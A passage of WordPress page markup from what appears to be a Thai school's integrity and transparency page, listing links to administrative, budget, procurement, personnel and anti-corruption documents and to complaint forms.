900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 